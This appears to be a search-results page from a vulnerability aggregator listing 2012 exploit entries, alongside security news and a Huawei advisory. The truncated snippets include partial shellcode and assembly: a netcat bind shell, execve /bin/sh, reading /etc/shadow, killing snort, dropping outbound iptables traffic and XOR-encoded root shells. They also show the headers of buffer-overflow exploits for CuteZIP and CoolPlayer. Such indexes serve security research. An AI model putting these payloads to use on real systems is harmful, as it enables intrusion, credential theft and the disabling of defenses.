Lucene search
K

7260 matches found

Packet Storm
Packet Storm
added 2012/08/15 12:0 a.m.31 views

globalSCAPE CuteZIP Stack Buffer Overflow

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit web site for more information on licensing and terms of use. http://metasploit.com/ require 'msf/core' require 'rex/zip' class Metasploit3 'globalSCAPE CuteZIP...

0.6AI score
Exploits0
ThreatPost
ThreatPost
added 2012/08/09 2:28 p.m.25 views

Researcher Finds Technique to Bypass Microsoft's EMET Protections

A security researchers has discovered a pair of methods that enable him to bypass the protections offered by Microsoft’s EMET anti-exploit technology. The Enhanced Mitigation Experience Toolkit, which Microsoft updated late last month to include one of the three technologies that were finalists i...

9.3CVSS0.4AI score0.99945EPSS
Exploits39References6
ThreatPost
ThreatPost
added 2012/08/09 2:48 a.m.9 views

Poll Finds Security Practitioners Falsely Believe They're Protected Against APTs

If a recent poll of 1,000 security professionals is any indication, there remains a significant learning gap in understanding advanced persistent threats – and therefore building a strong defense to resist them. The survey conducted by FireEye’s Malware Intelligence Lab showed nearly 60 percent o...

0.2AI score
Exploits0References2
Packet Storm
Packet Storm
added 2012/08/07 12:0 a.m.17 views

CoolPlayer+ Portable 2.19.2 Buffer Overflow

!/usr/bin/ruby Exploit for CoolPlayer+ Portable 2.19.2 Based on exploit by Blake and Dhruval. Vulnerability found by Securityxxxpert Original: http://www.exploit-db.com/exploits/20262/ This one by Robert Larsen Lots of room for shellcode as opposed to original exploit. Shellcode created with:...

0.3AI score
Exploits0
0day.today
0day.today
added 2012/08/06 12:0 a.m.18 views

CoolPlayer+ Portable 2.19.2 Buffer Overflow ASLR Bypass (Large Shellcode)

Exploit for windows platform in category local exploits !/usr/bin/ruby Exploit for CoolPlayer+ Portable 2.19.2 Based on exploit by Blake and Dhruval. Vulnerability found by Securityxxxpert Original: http://www.exploit-db.com/exploits/20262/ This one by Robert Larsen Lots of room for shellcode as...

6.8AI score
Exploits0
exploitpack
exploitpack
added 2012/08/06 12:0 a.m.13 views

CoolPlayer+ Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass)

CoolPlayer+ Portable 2.19.2 - Local Buffer Overflow ASLR Bypass !/usr/bin/ruby Exploit for CoolPlayer+ Portable 2.19.2 Based on exploit by Blake and Dhruval. Vulnerability found by Securityxxxpert Original: http://www.exploit-db.com/exploits/20262/ This one by Robert Larsen Lots of room for...

0.1AI score
Exploits0
Exploit DB
Exploit DB
added 2012/08/06 12:0 a.m.21 views

CoolPlayer+ Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass)

!/usr/bin/ruby Exploit for CoolPlayer+ Portable 2.19.2 Based on exploit by Blake and Dhruval. Vulnerability found by Securityxxxpert Original: http://www.exploit-db.com/exploits/20262/ This one by Robert Larsen Lots of room for shellcode as opposed to original exploit. Shellcode created with:...

7.4AI score
Exploits0
0day.today
0day.today
added 2012/08/05 12:0 a.m.15 views

CoolPlayer Portable 2.19.2 Buffer Overflow ASLR bypass

Exploit for windows platform in category local exploits Buffer overflow that bypasses ASLR by using a non-aslr module Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit Written by Blake patched by Dhruvalemail protected Originally found by Securityxxxpert print...

6.8AI score
Exploits0
exploitpack
exploitpack
added 2012/08/05 12:0 a.m.19 views

CoolPlayer Portable 2.19.2 - Local Buffer Overflow (ASLR Bypass) (2)

CoolPlayer Portable 2.19.2 - Local Buffer Overflow ASLR Bypass 2 Buffer overflow that bypasses ASLR by using a non-aslr module Tested against CoolPlayer Portable version 2.19.2 on Windows Vista Business 32 bit Written by Blake patched by pole Originally found by Securityxxxpert print...

0.1AI score
Exploits0
Huawei
Huawei
added 2012/08/04 12:0 a.m.13 views

Security Advisory-Buffer Overflow on Heap When Parsing Http Response in HTTP Module

Branch Intelligent Management System BIMS and Web management is provided by Huawei for network and device management. Both BIMS and Web management use HTTP. Therefore, to use BIMS and Web management, you must enable HTTP. Attackers can make heap overflow by sending malformed HTTP Response message...

7.2AI score
Exploits0
0day.today
0day.today
added 2012/08/03 12:0 a.m.54 views

Psexec Via Current User Token

Exploit for windows platform in category remote exploits $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

7.1AI score0.63703EPSS
Exploits13
0day.today
0day.today
added 2012/08/03 12:0 a.m.15 views

linux/x86 - nc -lvve/bin/sh -p13377 - 62 bytes

linux x86 nc -lvve/bin/sh -p13377 shellcode This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker Author: Anonymous Site: http://chaossecurity.wordpress.com/ Here is code written in NASM ///////////////////////////// section .text global start start: xor...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2012/08/02 12:0 a.m.64 views

Linux x86 - ASLR deactivation 83 bytes

Linux x86 - ASLR deactivation 83 bytes. Shellcode exploit for linx86 platform / Title: Linux x86 ASLR deactivation - 83 bytes Author: Jean Pascal Pereira Web: http://0xffe4.org Disassembly of section .text: 08048060 : 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: 68 70 61 63 65 push...

7.4AI score
Exploits0
0day.today
0day.today
added 2012/08/02 12:0 a.m.12 views

linux/x86 - Shellcode execve ("/bin/sh") - 21 Bytes

/ Title: linux/x86 Shellcode execve "/bin/sh" - 21 Bytes Date : 10 Feb 2011 Author : kernelpanik Thanks : cOokie, agix, antrhacks / / xor ecx, ecx mul ecx push ecx push 0x68732f2f ;; hs// push 0x6e69622f ;; nib/ mov ebx, esp mov al, 11 int 0x80 / include include char code =...

0.3AI score
Exploits0
0day.today
0day.today
added 2012/08/01 12:0 a.m.20 views

linux/x86- setreuid (0,0) & execve("/bin/ksh", [/bin/ksh, NULL]) + XOR encoded - 53 bytes

Title: Linux x86 setreuid 0,0 & execve"/bin/ksh", "/bin/ksh", NULL + XOR encoded - 53 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Jonathan Salwan, Yuda Prawira and Rizki Wicaksono from ctypes import shell =...

0.1AI score
Exploits0
0day.today
0day.today
added 2012/08/01 12:0 a.m.16 views

linux/x86 - /usr/bin/killall snort - 46 bytes

Name = John Babio Twitter = 3vi1john /usr/bin/killall snort const char sc = "\x31\xc0\x50\x6a\x74\x68\x73\x6e\x6f\x72\x89\xe6\x50\x68\x6c\x61\x6c\x6c\x68\x2f\x6b" "\x69\x6c\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x50\x56\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; main int shell; shell=sc; shel...

Exploits0
0day.today
0day.today
added 2012/08/01 12:0 a.m.19 views

linux/x86 - execve(/bin/cat, /etc/shadow, NULL) - 42 bytes

/ Title: linux/x86 execve/bin/cat, /etc/shadow, NULL - 42 bytes Type: Shellcode Author: antrhacks Platform: Linux X86 / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2f 63 61 74 push $0x7461632f 68 2f 62 69 6e push $0x6e69622f 89 e3 mov %esp,%ebx 50 push %eax 68 61 64 6f 77 push $0x776f6461 68 2...

0.1AI score
Exploits0
0day.today
0day.today
added 2012/08/01 12:0 a.m.14 views

linux/x86 - execve(/bin/dash) - 49 bytes

/ Shellcode length: 49 Author: Chroniccommand /bin/dash My first attempt at shellcode Poison security / include //49 bytes char shellcode = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a" "\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d" "\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f"...

7.4AI score
Exploits0
0day.today
0day.today
added 2012/08/01 12:0 a.m.17 views

linux/x86 - /sbin/iptables -POUTPUT DROP - 60 bytes

Name = John Babio Twitter = 3vi1john Arch = Linux/x86-32 bits Code ///sbin/iptables -POUTPUT DROPPolicy of drop to OUTPUT chain const char sc = "\x31\xc0\x31\xd2\x50\x68\x44\x52\x4f\x50\x89\xe7\x50\x68\x54\x50\x55\x54\x68\x2d"...

7.4AI score
Exploits0
0day.today
0day.today
added 2012/08/01 12:0 a.m.18 views

linux/x86 - setreuid (0,0) & execve("/bin/zsh", ["/bin/zsh", NULL]) + XOR encoded 53 bytes

Title: Linux x86 setreuid 0,0 & execve"/bin/zsh", "/bin/zsh", NULL + XOR encoded - 53 bytes Author: egeektronic Twitter: @egeektronic Tested on: Slackware 13.37 Thanks: Jonathan Salwan, Yuda Prawira and Rizki Wicaksono from ctypes import shell =...

7.4AI score
Exploits0
Rows per page
Query Builder